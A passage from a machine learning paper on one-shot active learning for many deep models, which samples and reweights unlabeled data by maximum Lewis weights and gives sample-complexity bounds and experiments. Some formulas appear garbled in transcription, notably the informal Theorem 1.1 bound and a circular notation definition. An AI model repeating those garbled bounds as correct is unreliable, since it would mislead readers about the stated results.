\mathbb{R}^d$ for all models $j$ simultaneously. Since the construction of $S$ is independent of $y^1, \ldots, y^c$, we henceforth assume that $c = 1$, with a single label vector $y \in \mathbb{R}^n$. Therefore, we seek a shared reweighted sampling matrix $S$ such that we can, from the labels of the sampled instances $Sy$, approximately solve the regression problem $\min_\theta \|f(A^j \theta) - y\|_p^p$ for all models $j$ simultaneously. The simplest case is when there is a single model, i.e., $k = 1$. In this case, Gajjar et al. (2023a) are the first to study the problem of actively learning a single neuron model. They cast the problem as a least-squares regression problem (i.e. $p = 2$) $\min_\theta \|f(A \theta) - y\|_2^2$ and find an $\tilde{\theta}$ such that $$\|f(A \tilde{\theta}) - y\|_2^2 \leq C \cdot (\|f(A \theta^*) - y\|_2^2 + \epsilon L^2 \|A \theta^*\|_2^2),$$ where $\theta^* = \arg \min_\theta \|f(A \theta) - y\|_2^2$ is the minimizer, $C$ is an absolute constant and $\epsilon$ is an accuracy parameter. Recall that $L$ is the Lipschitz constant of $f$. Gajjar et al. (2023a) also show that the additive term $\epsilon L^2 \|A \theta^*\|_2^2$ is necessary. For $k > 1$ and general $p$, we seek approximate solutions $\tilde{\theta}_1, \ldots, \tilde{\theta}_k$ with the following error guarantee of a similar form on each individual model: $$\|f(A^j \tilde{\theta}_j) - y\|_p^p \leq C \cdot (\|f(A^j \theta^j) - y\|_p^p + \epsilon L^p \|A^j \theta^j\|_p^p),$$ where $\theta^j = \arg \min_\theta \|f(A^j \theta) - y\|_p^p$ is the minimizer for model $j$ and $C = C(p) > 0$ is a constant depending only on $p$. Gajjar et al. (2023a) construct $S$ to be a leverage score sampling matrix and solve $\tilde{\theta} = \arg \min_{\theta \in E} \|f(SA \theta) - Sy\|_2^2$ with $E = \{\theta : \|SA \theta\|_2^2 \leq \|Sy\|_2^2 / (\epsilon L^2)\}$. At the core of their argument lies the classical fact that such an $S$ gives an $\ell_2$ subspace embedding for $A$, i.e., $\|SA \theta\|_2 \approx \|A \theta\|_2$ for all $\theta$ simultaneously. In fact, it is not necessary to sample the rows of $A$ according to the exact leverage scores $\tau_1(A), \ldots, \tau_n(A)$; any sampling probability proportional to $t_i \geq \tau_i(A)$ for $i$-th row will suffice, with the number of samples being proportional to $\sum_i t_i$. This very fact motivates us to tackle the task of data selection from diverse representations by sampling the rows according to the maximum of leverage scores across $A^j$'s, i.e., letting $t_j \sim \max_j \tau_i(A^j)$. Solving for each model $j$ by $\tilde{\theta}_j = \arg \min_{\theta \in E^j} \|f(SA^j \theta) - Sy\|_2^2$ with $E^j = \{\theta : \|SA^j \theta\|_2^2 \leq \|Sy\|_2^2 / (\epsilon L^2)\}$ will then achieve (1) for $p = 2$. This indicates that the queried instances are effective in learning each of the linear predictors, which fits our problem well. A potential caveat is that the number of samples needed will be proportional to... \[ \sum_i t_i \sim \sum_i \max_j \tau_i(A^j), \text{ which could be as large as } kd. \text{ However, empirical studies show that this is not the case for real-world datasets (see Section 3.2) and our approach will thus be efficient.} \] For general \( p \), instead of leverage scores, it is natural to consider Lewis weights, which can be seen as generalizations of leverage scores for general \( p \) (see Section 3.1 for the definition). It is known that an \( \ell_p \) Lewis weight sampling matrix \( S \) give an \( \ell_p \) subspace embedding, i.e., \( \| SA\theta \|_p \approx \| A\theta \|_p \) for all \( \theta \) simultaneously (Cohen & Peng, 2015). The approach mentioned above extends to general \( p \) naturally, attaining (1) for general \( p \), by sampling according to the maximum Lewis weights and solving an \( \ell_p \)-regression problem for \( \tilde{x}^j \) with an \( \ell_p \)-version of \( E^j \). **Theoretical Results.** For \( k = 1 \), the latest result is to use \( \tilde{O}(d/\epsilon^4) \) queries Gajjar et al. (2023b), with an analysis specific to \( p = 2 \). We generalize the approach to the \( \ell_p \) Lewis weight sampling for \( p \geq 1 \) and extends it to \( k \geq 1 \), giving the following theorem. **Theorem 1.1** (Informal version of Corollary 3.6). Let \( w_1(A^j), \ldots, w_n(A^j) \) denote the Lewis weights of \( A^j \) and \( T = \sum_{i=1}^{n} \max_{j \in [k]} w_i(A^j) \). Suppose that \( T = \text{poly}(d) \). There exists a randomized algorithm which samples \[ m \lesssim \begin{cases} \epsilon^{-4}T \log d, & p = 1 \\ \epsilon^{-4}T_d \max\{\frac{k}{2}, 1, 0\} \log^2 d \log(d/\epsilon), & p > 0 \text{ and } p \neq 1 \end{cases} \] unlabeled instances and outputs solutions \( \hat{\theta}^1, \ldots, \hat{\theta}^k \in \mathbb{R}^d \) such that (1) holds for all \( j \in [k] \) with probability at least 0.9. Note that for a single matrix \( A \in \mathbb{R}^{n \times d} \), the sum \( T = \sum_i w_i(A) = d \) and so Theorem 1.1 implies a sample complexity of \( \tilde{O}(d^{\max\{p/2, 1\}}/\epsilon^4) \), recovering the result in Gajjar et al. (2023b) for \( p = 2 \). **Empirical Findings.** Extensive experiments are conducted on 11 classification and regression benchmarks with 50 distinct deep models. In Section 3.2, we empirically observe that the sum of the maximum leverage scores grows very slowly as the number of models increases. This result reveals the strong correlation among the leverage scores of different deep representations, providing a direction for interpreting deep representation learning (Kornblith et al., 2019; Nguyen et al., 2020). In Section 4, we validate the effectiveness of our method with fine-tuning and vanilla learning scenarios of deep models for both the \( \ell_2 \)-regression loss and cross-entropy loss. The results show that our method outperforms other one-shot baselines. Even when comparing with the state-of-the-art iterative AL methods for multiple models, our approach achieves competitive performance. ## 2 RELATED WORK Active learning has been extensively studied in the past decades (Settles, 2009; Ren et al., 2021). With a limited query budget, many methods try to query the labels of the most useful instances for a target model by designing effective selection criteria, which commonly depend on two notions, informativeness and representativeness. Informativeness-based criteria prefer instances where the target model has a highly uncertain prediction (Lewis & Gale, 1994; Yan & Huang, 2018; Kirsch et al., 2019), while representativeness-based criteria prefer instances which can help reduce the distribution gap between the queried instances and the entire dataset (Dasgupta & Hsu, 2008; Chattopadhyay et al., 2012; Sener & Savarese, 2018). While most existing methods focus on improving the performance of a specific target model, Tang & Huang (2022) extend the setting of AL to multiple target models. In this scenario, the active learner seeks to enhance the performance of every target model simultaneously by selective querying. Their work demonstrates that the query complexity of AL for multiple models can be upper bounded by that of an appropriately designed single model. Based on this insight, they propose an iterative algorithm called DIAM, which queries the labels of the instances located in the joint disagreement regions among multiple models. Although the method is effective, a significant concern is the substantial cost incurred by training multiple deep models at each iteration. To reduce the computational cost of repetitive model training, one-shot AL algorithms have been proposed to query all useful instances in a single batch, thereby avoiding the need for model updates. Yang & Loog (2019) employ existing AL methods with pseudo-labeling to obtain a candidate set of diverse instances, and select the queries based on the feature distance between unlabeled instances and candidate instances. Viering et al. (2019) select representative data points by the kernelized discrepancy methods, e.g., Maximum Mean Discrepancy (MMD) (Borgwardt et al., 2006), and give error bounds under different assumptions on data distribution. Jin et al. (2022) propose a one-shot AL method for deep image segmentation. Their approach uses self-supervised learning to obtain more informative representations and selects diverse instances based on clustering results and feature distances. In addition, Coreset (Sener & Savarese, 2018) and Transductive Experimental Design (Yu et al., 2006) are implicit one-shot AL methods. However, all the aforementioned one-shot AL methods cannot handle the distinct representations of multiple deep models. Although most existing AL methods rely on heuristics lacking theoretical analysis, AL with Lewis weight sampling has been well studied for active $\ell_p$-regression problems $\min_{\theta} \|A\theta - y\|_p$, where the matrix $A \in \mathbb{R}^{n \times d}$ is fully accessible while the label vector $y \in \mathbb{R}^n$ needs to be queried (Chen & Price, 2019; Chen & Derezinski, 2021; Parulekar et al., 2021; Chen et al., 2022; Musco et al., 2022). Provable guarantees are obtained for $(1+\epsilon)$-approximate solutions, i.e., $\|A\theta' - y\|_p \leq (1+\epsilon)\|A\theta^* - y\|_p$, where $\theta'$ is the output of the algorithm and $\theta^*$ the true minimizer. For $p = 1$, Parulekar et al. (2021) show that $O(\epsilon^{-2}d \log(d/\epsilon))$ samples suffice. For $p = 2$, Chen & Price (2019) solve the problem optimally with $O(d/\epsilon)$ queries. For $p \in (1, 2)$, Chen & Derezinski (2021) propose the first algorithm to solve the problem with sublinear query complexity, i.e., $O(\epsilon^{-2}d^2 \log d)$. For $p > 2$, Musco et al. (2022) show that $O(\epsilon^{-p}d^{p/2} \log^2 d \log^{p-1}(d/\epsilon))$ queries suffice. Recently, Gajjar et al. (2023a) extend such sampling method to the single neuron model for $p = 2$, which inspires our work. They establish a multiplicative constant-factor error bound of the form (1) using $O(d^2/\epsilon^4)$ samples. This has been further improved to $O(d/\epsilon^4)$ in Gajjar et al. (2023b). 3 OUR APPROACH 3.1 PRELIMINARIES Notation. Suppose that the dataset has $n$ instances $\alpha_1, \ldots, \alpha_n$ and each $\alpha_i$ has a ground-truth label $y_i$. The given data consist of a small labeled set $L = \{(\alpha_i, y_i)\}_{i=1}^{n_l}$, used for model initialization, and a large unlabeled set $U = \{\alpha_{n_l+1}, \ldots, \alpha_n\}$, used for active querying. Here, $n = n_l + n_u$ and it is assumed that $n_l \ll n_u$. A neural network can be viewed as the composition of a network backbone and a linear prediction layer $\theta \in \mathbb{R}^d$ composed by an activation function $f(\cdot)$. The prediction of the network is given by $f(A\theta)$, where $A \in \mathbb{R}^{n \times d}$ is the feature matrix obtained by feeding the dataset into the network backbone. Denote by $y \in \mathbb{R}^n$ the corresponding label vector that needs to be queried. In our theoretical analysis, we assume that $d \ll n$, $A$ has full column rank, the network backbone is fixed during the learning of $\theta$ and $f$ is $L$-Lipschitz continuous with $f(0) = 0$. We always assume that $p > 0$. The $\ell_p$ norm of a vector $\theta$ is defined to be $\|\theta\|_p = (\sum_{i=1}^n |\theta_i|^p)^{1/p}$, where $\theta_i$ is the $i$-th coordinate of $\theta$. When $p < 1$, this is not a norm, nevertheless, it remains a well-defined quantity and we shall abuse the notation and denote it by $\|\theta\|_p$. For a matrix $A$, the operator norm of $A$ is defined as $\|A\|_2 = \sup_{\theta \in \mathbb{R}^d \setminus \{0\}} \|A\theta\|_2 / \|\theta\|_2$. For integer $n \geq 1$, we use $[n]$ to denote the set $\{1, 2, \ldots, n\}$. We write $a \sim b$ if $(1-\epsilon)b \leq a \leq (1+\epsilon)b$ and $a \lesssim b$ if there exists a constant $C$ depending only on $t_1, t_2, \ldots$ such that $a \leq Cb$. We also write $a \sim_{t_1, t_2, \ldots} b$ if $a \sim_{t_1, t_2, \ldots} b$ and $b \sim_{t_1, t_2, \ldots} a$. Lewis Weights Sampling. We shall define the Lewis weights and state a classical result that Lewis weight sampling gives subspace embeddings, which is the starting point of our algorithm. Definition 3.1 ($\ell_p$ Lewis Weights). Suppose that $A \in \mathbb{R}^{n \times d}$ and its $i$-th row is $a_i \in \mathbb{R}^d$. The Lewis weights of $A$ are $w_1, \ldots, w_n$ such that $w_i = (a_i^\top (A^\top W^{-1} A)^{-1} a_i)^{1/p}$, where $W$ is a diagonal matrix with diagonal elements $w_1, w_2, \ldots, w_n$. We remark that Lewis weights satisfy that $w_i(A) \in [0, 1]$ and $\sum_{i=1}^n w_i(A) = d$. When $p = 2$, Lewis weights are exactly the leverage scores. Next, we define $\ell_p$ subspace embedding and sampling matrix. Then, we state the result that Lewis weight sampling gives subspace embeddings. Definition 3.2 ($\ell_p$ Subspace Embedding). Let $\epsilon \in (0, 1)$ be the distortion parameter. A matrix $S \in \mathbb{R}^{m \times n}$ is said to be an $\ell_p$ $\epsilon$-subspace-embedding matrix for $A \in \mathbb{R}^{n \times d}$ if it holds simultaneously for all vectors $\theta \in \mathbb{R}^d$ that $(1-\epsilon)\|A\theta\|_p \leq \|SA\theta\|_p \leq (1+\epsilon)\|A\theta\|_p$. Definition 3.3 (Sampling Matrix). Suppose that $p_1, \ldots, p_n \geq 0$ such that $p_1 + p_2 + \cdots + p_n = 1$ and $e_1, \ldots, e_n$ are the standard basis vectors of $\mathbb{R}^n$. A matrix $S \in \mathbb{R}^{m \times n}$ is called a reweighted sampling matrix if the rows of $S$ are i.i.d. copies of random vector $X$, where $X = (mp_j)^{-1/p}e_j^T$ with probability $p_j$, $j = 1, \ldots, n$. The number $m$ of rows in $S$ is called the sample size. **Lemma 3.4** (Constant-factor Subspace Embedding, (Cohen & Peng, 2015, Theorem 7.1)). Given $A \in \mathbb{R}^{n \times d}$. Suppose that $t_i \geq \beta w_i$ for all $i \in [n]$, where $$\beta \gtrsim_p \begin{cases} \log^3 d + \log \frac{1}{\delta}, & 0 < p < 2, p \neq 1 \\ \log d, & p = 1, 2 \\ d^{\frac{p}{2} - 1}(\log d + \log \frac{1}{\delta}) & 2 < p < \infty \end{cases}$$ is a sampling parameter. Let $m = \sum_{i=1}^{n} t_i$. If $S \in \mathbb{R}^{m \times n}$ is a reweighted sampling matrix with sampling probability $p_i = \frac{t_i}{m}$ for all $i$, then $S$ is an $\ell_p$ subspace-embedding matrix for $A$ with probability at least $1 - \delta$. We note that our main theorem only requires constant-factor subspace embedding property of the sampling matrix $S$ and, therefore, we can ignore the dependence on $\epsilon$ in the bounds for $\ell_p$ subspace embeddings. The case of $p \leq 2$ is proved by Cohen & Peng (2015) and the case of $p > 2$ is originally due to Bourgain et al. (1989). ### 3.2 An Empirical Observation Recall that the sample size of maximum Lewis weight sampling is proportional to $\sum_i \max_j w_i(A^j)$. We would like first to examine this sum across representations as it will determine the potential query savings. In the following empirical studies, we mainly consider the case of $p = 2$ (i.e., squared loss), where the Lewis weight becomes exactly the leverage score. We conduct experiments on 11 datasets. Due to the space limitation, the empirical settings, dataset specifications and more results are deferred to Appendix D. We report the results of MNIST, CIFAR-100 and CelebA datasets below in Figure 1. We plot the theoretical upper bound and the exact values of the sum of the maximum leverage score of each instance across different representations. The results show that the exact sum grows very slowly as the number of models increases in both classification and regression tasks. This suggests highly consistent discrimination power of most instances across different representations, as the leverage score measures how hard an instance can be linearly represented by others. Therefore, our algorithm is cost-effective. Leverage scores also provide a possible direction to interpret the behavior of deep representation learning, as prior works have not discovered any simple form of correlation among the diverse representations obtained by different model architectures (Kornblith et al., 2019; Nguyen et al., 2020). ### 3.3 The Algorithm Based on our empirical observations, we propose to sample and reweight unlabeled instances based on their maximum Lewis weights across multiple representations. Specifically, given the feature matrices of the labeled and unlabeled instances (denoted by $\{L^j\}_{j=1}^{k}$ and $\{U^j\}_{j=1}^{k}$, respectively), our algorithm begins with calculating the Lewis weights of the unlabeled instances based on each of their feature representations. Next, a normalized maximum Lewis weight among multiple representations for each unlabeled instance is obtained: $$p_i = \frac{\max_{j \in [k]} w_i(U^j)}{\sum_{i=1}^{n_u} \max_{j \in [k]} w_i(U^j)}, \quad i = 1, \ldots, n_u.$$ ![Figure 1](image-url) (a) MNIST (b) CIFAR-100 (c) CelebA Figure 1: The trends of the sum of the maximum Lewis weights with $p = 2$ among multiple representations as the number of deep models increases. Algorithm 1 The Proposed Algorithm. **Input:** Feature matrices of labeled and unlabeled instances $L^j, U^j$ ($j = 1, \ldots, k$), query budget $\tau$. **Output:** Trained linear models $\hat{\theta}^1, \ldots, \hat{\theta}^k$. **Initialize:** $p, \bar{y} \leftarrow$ zero vector of length $n_u$; $Q \leftarrow$ an empty list; $m \leftarrow 0$ 1: $p_i \leftarrow \max_{1 \leq j \leq k} w_i(U^j)$ for $i = 1, \ldots, n_u$ 2: $p_i \leftarrow p_i / \|p\|_1$ for $i = 1, \ldots, n_u$ 3: while $Q$ has fewer than $\tau$ distinct elements do 4: $q \leftarrow$ sample a number from $[n_u]$ with replacement with probability $p_1, \ldots, p_{n_u}$ 5: $m \leftarrow m + 1$ 6: append $q$ to $Q$ 7: if the label of $q$-th unlabeled instance is unknown then 8: $\bar{y}_q \leftarrow$ query the label of $q$-th unlabeled instance 9: $S \leftarrow$ zero matrix with shape $(n_l + m) \times (n_l + n_u)$ 10: $S_{i,i} \leftarrow 1$ for $i = 1, \ldots, n_l$ 11: $S_{i+n_l,Q_i+n_l} \leftarrow (m \cdot p_Q)_i^{-1/p}$ for $i = 1, \ldots, m$ 12: $\bar{y} \leftarrow [y_1, \ldots, y_{n_l}, \bar{y}]^T$ 13: for $j = 1, \ldots, k$ do 14: $A^j \leftarrow \begin{bmatrix} L^j \\ U^j \end{bmatrix}$ 15: $\hat{\theta}^j \leftarrow \arg\min_{x \in E} \|Sf(A^j x) - Sy\|_p$, where $E = \{\theta : \|SA^j \theta\|_p \leq \frac{1}{\epsilon L^p} \|Sy\|_p\}$ 16: return $\hat{\theta}^1, \ldots, \hat{\theta}^k$ In the querying phase, we conduct i.i.d. sampling with replacement on the unlabeled set using a probability distribution $p$. The sampling process is repeated until $\tau$ distinct unlabeled instances are sampled. Let $Q$ denote the set of indices of unlabeled instances that are selected for label query. We reweight each of the instance with index $q \in Q$ by $(m \cdot p_q)^{-1/p}$. Finally, both the initially labeled instances with weight 1 and the reweighted queried instances will be used to update each of the target model. Note that, although $Q$ may contain repeated entries, each instance will be queried only once and reoccurrences will not incur additional query cost. We present our algorithm in Algorithm 1. ### 3.4 Theoretical Guarantees Our main result is as follows, which can be seen as the guarantee for a single model. **Theorem 3.5.** Let $p > 0$, $f(\theta)$ be an $L$-Lipschitz function with $f(0) = 0$, $A \in \mathbb{R}^{n \times d}$ be the data matrix and $y \in \mathbb{R}^n$ be the target vector. Consider a reweighted sampling matrix $S$ with row sampling probability $p_i = \frac{t_i}{m}$, where $t_1, \ldots, t_n$ are some quantities and $m = \sum_i t_i$. Suppose that $t_1, \ldots, t_n \in \mathbb{R}$ satisfy that $t_i \geq \beta w_i(A)$, where $$ \beta \gtrsim_p \begin{cases} \epsilon^{-4} \log(\sum_{i=1}^n t_i), & p = 1 \\ \epsilon^{-4} d^{\max\{\frac{p}{2}-1, 0\}} \log^2 d \log(\sum_{i=1}^n t_i), & p > 0 \text{ and } p \neq 1. \end{cases} $$ Then, if $S$ is a reweighted sampling matrix as described above and $\hat{\theta} = \arg\min_{\theta \in E} \|Sf(Ax) - Sy\|_p$, where $E = \{\theta : \|SA\theta\|_p \leq \|Sy\|_p/(\epsilon L^p)\}$, it holds with probability at least 0.9 that $$ \|f(A\hat{\theta}) - y\|_p \leq C \left(\|f(A\theta^*) - y\|_p + \epsilon L^p \|A\theta^*\|_p\right), $$ where $\theta^* = \arg\min_{\theta} \|f(A\theta) - y\|_p$, and $C > 0$ is a constant depending only on $p$. The proof of Theorem 3.5 is deferred to Appendix A. Our analysis also suggests that an $\ell_p$-subspace-embedding can be obtained using $\tilde{O}(d/\epsilon^2)$ samples, removing the $\log n$ factor in (Woodruff & Yasuda, 2023), which may be of independent interest. See Appendix B for discussions. Below we show the guarantee for multiple models, which follows easily as a corollary of Theorem 3.5. **Corollary 3.6.** Let $A_1, \ldots, A_k \in \mathbb{R}^{n \times d}$ be data matrices and $T = \sum_{i=1}^n \max_{j \in [k]} w_i(A^j)$. Let $f(\theta)$ be an $L$-Lipschitz function with $f(0) = 0$ and $y \in \mathbb{R}^n$ be the target vector. There exists an algorithm that makes $$ m \sim_p \begin{cases} \epsilon^{-4} T \log(T/\epsilon), & p = 1 \\ \epsilon^{-4} T d^{\max\{\frac{p}{2}-1, 0\}} \log^2 d \log(dT/\epsilon), & p > 0 \text{ and } p \neq 1 \end{cases} $$ queries and outputs solutions $\tilde{\theta}^1, \ldots, \tilde{\theta}^k \in \mathbb{R}^d$ such that (1) holds for all $j \in [k]$ with probability at least 0.9. Proof. Let $t_i = \beta \cdot \max_j w_i(A^j)$, then for any fixed $j$, it holds that $t_i \geq \beta w_i(A^j)$. Also, $m = \sum_i t_i = \beta T$. The sampling probability $p_i = t_i/m = \max_j w_i(A^j)/T$, which is exactly our sampling scheme in Algorithm 1. Take $$\beta \sim \begin{cases} \epsilon^{-4} \log d, & p = 1 \\ \epsilon^{-4} d^{\max\left(\frac{p}{2}-1,0\right)} \log^2 d \log(dT/\epsilon), & p > 0 \text{ and } p \neq 1 \end{cases},$$ then $\beta$ satisfies the condition (2) in Theorem 3.5, whence the conclusion follows. Remark. The proof of Corollary 3.6 implies the same guarantee for Algorithm 1 if $\tau$ is set to be the quantity for $m$ in (3). Indeed, the proof of Corollary 3.6 shows that the guarantee holds as soon as the variable $m$ in Algorithm 1 reaches the desired amount in (3), which allows double counting of identical sampled rows; setting $\tau$ to be the same value will only result in a larger number $m$ of samples and the guarantee will persist. 4 EXPERIMENT In this section, we conduct experiments to validate the effectiveness of our method\(^1\). Due to the space limitation, some empirical settings and experimental results are presented in the appendix. Empirical Settings. We incorporate two learning scenarios in our experiments, i.e., fine-tuning and vanilla deep learning. The first one is a common learning scenario for big models. It first pre-trains the model on preliminary tasks. Then, the weights of the network backbone are fixed, and only the prediction heads are fine-tuned on downstream tasks. This setting aligns well with our problem formulation. The second scenario is the default learning scheme, i.e., updating all the parameters of the network with the training dataset. We employ 50 distinct network architectures as the target models. These architectures are published by a recent NAS method OFA (Cai et al., 2019) for accommodating diverse resource-constraint devices, ranging from NVIDIA Tesla V100 GPU to mobile devices. It aligns well with our problem setting. We conduct experiments on 11 datasets, including 8 classification benchmarks: MNIST (LeCun et al., 1998), Fashion-MNIST (Xiao et al., 2017), Kuzushiji-MNIST (Clanuwat et al., 2018), SVHN (Netzer et al., 2011), EMNIST-letters and EMNIST-digits (Cohen et al., 2017), CIFAR-10 and CIFAR-100 (Krizhevsky, 2009); and 3 regression benchmarks: Biwi (Fanelli et al., 2013), FLD (Sun et al., 2013) and CelebA (Liu et al., 2015). The specifications of the datasets and model configurations are deferred to the Appendix E.1. The active learning settings are outlined as follows. • For the scenario of vanilla deep learning, we conduct performance comparisons on the classification benchmarks. Specifically, 3000 instances are sampled uniformly from the training set to initialize the models. The other compared methods will then select 3000 unlabeled instances from the remaining data points for querying at each iteration, while our method conducts one-shot querying with budgets of 9000 and 15000 instances. The cross-entropy loss is employed in model training. In this scenario, the one-shot methods also query 3000 instances per batch for better comparison. However, these methods select batches independently. • For the fine-tuning scenario, we use the regression datasets. Initially, 500 instances are sampled uniformly from the training set to fine-tune each network. Then, we fix the backbone parameters and actively query the labels among the remaining instances. Afterwards, 50 linear prediction layers with mean squared error (MSE) loss and ReLU activation function are trained on the updated labeled dataset, utilizing the features extracted by different network backbones. In this scenario, all the compared methods have the same query budgets of 3000 and 6000 instances. We compare our algorithm with the following methods in the vanilla deep learning scenario. • (iterative) DIAM (Tang & Huang, 2022): The state-of-the-art iterative AL method for multiple target models, which prefers the instances in the joint disagreement regions of multiple models. --- \(^1\)All experiments are conducted on a machine with four GeForce RTX 3090 graphic cards and an Intel Xeon Gold 5317 CPU. The source code is included in the supplementary material for experiment reproducibility. Figure 2: Results of Performance comparison in classification datasets. The error bars indicate the standard deviation of the performances of multiple models. - (iterative) Entropy (Lew is & Catlett, 1994): This strategy selects instances with the highest prediction entropy. We follow the implementation in (Tang & Huang, 2022) to adapt it to multiple models. It queries the instances with the highest mean prediction entropy. - (iterative) QBC (Seung et al., 1992): This strategy selects the instances that the target models have the most inconsistent predictions. The inconsistency is evaluated by KL divergence. - (one-shot) Coreset (Sener & Savarese, 2018): This strategy selects the most representative instances. We follow the implementation in (Tang & Huang, 2022) to adapt it to multiple models. It solves the coreset problem based on the features extracted by the supernet in OFA. - (one-shot) Random: This strategy selects instances uniformly from the unlabeled pool. In the fine-tuning scenario, fewer existing methods are available. Specifically, we compare our algorithm with Coreset, Random and QBC methods. Although QBC is usually implemented in an iterative fashion, we employ a large query batch size for it to unify the query settings. Our method selects and reweights the unlabeled instances based on the leverage scores (i.e., \( p = 2 \)) in both scenarios. Note that, in the fine-tuning scenario, our implementations remove the constraint \( E \) in Line 15 in Algorithm 1 for better examination of the practicability. In the vanilla deep learning scenario, we use the default training scheme of deep models to replace Line 15 in Algorithm 1. The mean accuracy and the mean MSE are used to evaluate the performances of multiple target models for classification and regression tasks, respectively. **Experiment Results.** We report the performance comparison results in Figure 2 and Figure 3. In the scenario of vanilla deep learning, we can observe that our one-shot method achieves comparable performances with the other iterative AL methods in most cases. This phenomenon indicates that our method can significantly reduce the costs of training multiple deep model while preserving its proficiency in the ability of query saving. QBC is the worst one. We find that it causes a severe class imbalance according to the results in Table 5 in the appendix. This may explain its inferior performances. Coreset is usually worse than Random. Note that, the problem settings of Sener & Savarese (2018) and our work are different. there are 50 distinct target networks to be learned in | Dataset | MNIST | F-MNIST | K-MNIST | SVHN | CIF.10 | CIF.100 | EMN.I. | EMN.d. | |---------|-------|---------|---------|------|--------|--------|--------|--------| | DIAM | 46.643| 47.597 | 46.765 | 52.228| 45.493 | 53.532 | 73.522 | 120.840| | QBC | 23.937| 24.419 | 24.502 | 26.011| 25.541 | 30.498 | 36.280 | 40.231 | | Entropy | 24.060| 24.293 | 24.455 | 25.792| 25.173 | 28.655 | 34.291 | 42.719 | | Our | 5.299 | 5.366 | 5.354 | 5.605 | 5.350 | 5.57 | 9.717 | 12.711 | | Coreset | 5.200 | 5.201 | 5.285 | 5.466 | 5.450 | 5.745 | 8.984 | 11.043 | | Random | 4.317 | 4.333 | 4.402 | 4.583 | 4.567 | 4.712 | 7.317 | 8.027 | Table 1: Comparisons on the running time between our method and the other baselines with a query budget 15000 instances. The running time includes data querying and model training (GPU hours). our experiment. The Coreset implementation of Tang & Huang (2022) solves the coreset problem based on the features extracted by the supernet. A drawback of this approach is that the selected instances may not be useful for other models, because the data representations are different. We believe this is the reason that why Coreset is less effective than Random in our setting. Entropy method achieves comparable performances with Random. The reason may also be evidenced by the results in Table 5 in the appendix that their class imbalance ratios are highly consistent, implies that the mean entropy scores tend to have an extremely small standard deviation. The performances of DIAM are less stable. It is effective in the datasets associated with MNIST, but fails on the others. This deficiency has not been observed in our method. In the scenario of fine-tuning, Figure 3 shows that our approach outperforms than the other baselines with different querying budgets in terms of achieving better mean MSE. These results indicate that our method is effective and robust to different query budgets, it can effectively identify the desired number of useful unlabeled instances under diverse representations to learn linear prediction layers. We further examine the running time of different AL methods. The results are reported in Table 1. For the one-shot methods Coreset and Random, we report their running time of one-shot querying 15000 instances. It can be observed that the cost of repeated model training is prohibitive in AL for multiple deep models, demonstrating the advantages of one-shot querying. Among the active selection methods, DIAM is the slowest approach because it selects instances based on the predictions of the unlabeled dataset in the latter half of training epochs of each target model. Generating the predictions from multiple models could be expensive, particularly with a large unlabeled pool. QBC and Entropy exhibit similar time costs. Both of them need to feed the unlabeled instances into 50 models to obtain their predictions. In the fine-tuning scenario, all the compared methods conduct one-shot querying and linear prediction layers are trained with the same computational costs. As a result, the running time of the compared methods is comparable. The results are deferred to Table 6 in the appendix. 5 CONCLUSION In this paper, we propose a one-shot AL algorithm for multiple deep models. The task is formulated as seeking a shared reweighted sampling matrix to approximately solve multiple $\ell_p$-regression problems for neuron models on distinct deep representations. Our approach is to sample and reweight the unlabeled instances based on their maximum Lewis weights across different representations. We establish an upper bound on the number of samples needed by our algorithm to achieve constant-factor approximations for multiple models and general $p$. Our techniques on the one hand substantially improve the upper bound on the number of samples of (Gajjar et al., 2023a) in the case of single model and $p = 2$, on the other hand remove the log $n$ factor in (Woodruff & Yasuda, 2023) for Lewis weight sampling to obtain $\ell_p$-subspace-embedding. Extensive experiments are conducted on 11 benchmarks and 50 deep models. We observe that the sum of the maximum Lewis weights with $p = 2$ grows very slowly as the number of target models increases, providing a direction for interpreting deep representation learning. The performance comparisons show that our algorithm achieves competitive performances with the state-of-the-art AL methods for multiple deep models. ACKNOWLEDGMENTS S.-J. Huang is supported in part by the National Science and Technology Major Project (2020AAA0107000), the Natural Science Foundation of Jiangsu Province of China (BK20222012, BK20211517), and NSFC (62222605). Y. Li is supported in part by the Singapore Ministry of Education (AcRF) Tier 2 grant MOE-T2EP20122-0001 and Tier 1 grant RG75/21. Y.-P. Tang was supported in part by the China Scholarship Council during his visit to Nanyang Technological University, where most of this work was done. REFERENCES Karsten M. Borgwardt, Arthur Gretton, Malte J. Rasch, Hans-Peter Kriegel, Bernhard Schölkopf, and Alexander J. Smola. Integrating structured biological data by kernel maximum mean discrepancy. In Proceedings of the 14th Annual International Conference on Intelligent Systems for Molecular Biology, pp. 49–57, 2006. J. Bourgain, J. Lindenstrauss, and V. Milman. Approximation of zonoids by zonotopes. Acta Mathematica, 162:73 – 141, 1989. doi: 10.1007/BF02392835. URL https://doi.org/10.1007/BF02392835. Han Cai, Chuang Gan, Tianzhe Wang, Zhekai Zhang, and Song Han. Once-for-all: Train one network and specialize it for efficient deployment. In Proceedings of the 7th International Conference on Learning Representations, 2019. Rita Chattopadhyay, Zheng Wang, Wei Fan, Ian Davidson, Sethuraman Panchanathan, and Jieping Ye. Batch mode active sampling based on marginal probability distribution matching. In Proceedings of the 18th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining, pp. 741–749, 2012. Cheng Chen, Yi Li, and Yiming Sun. Online active regression. In Proceedings of the 39th International Conference on Machine Learning, pp. 3320–3335. PMLR, 2022. Xue Chen and Michal Derezinski. Query complexity of least absolute deviation regression via robust uniform convergence. In Proceedings of the 34th Annual Conference on Learning Theory, pp. 1144–1179. PMLR, 2021. Xue Chen and Eric Price. Active regression via linear-sample sparsification. In Proceedings of the 32nd Annual Conference on Learning Theory, pp. 663–695. PMLR, 2019. Tarin Clanuwat, Mikel Bober-Irizar, Asanobu Kitamoto, Alex Lamb, Kazuaki Yamamoto, and David Ha. Deep learning for classical japanese literature. arXiv cs.CV/1812.01718, 2018. Gregory Cohen, Saeed Afshar, Jonathan Tapson, and André van Schaik. EMNIST: an extension of MNIST to handwritten letters. arXiv cs.CV//1702.05373, 2017. Michael B Cohen and Richard Peng. $L_p$ row sampling by Lewis weights. In Proceedings of the 47th Annual ACM Symposium on Theory of Computing, pp. 183–192, 2015. David Cohn, Les Atlas, and Richard Ladner. Improving generalization with active learning. Machine Learning, 15(2):201–221, 1994. Sanjoy Dasgupta and Daniel Hsu. Hierarchical sampling for active learning. In Proceedings of the 25th International conference on Machine learning, pp. 208–215, 2008. Lei Deng, Guoqi Li, Song Han, Luping Shi, and Yuan Xie. Model compression and hardware acceleration for neural networks: A comprehensive survey. Proceedings of the 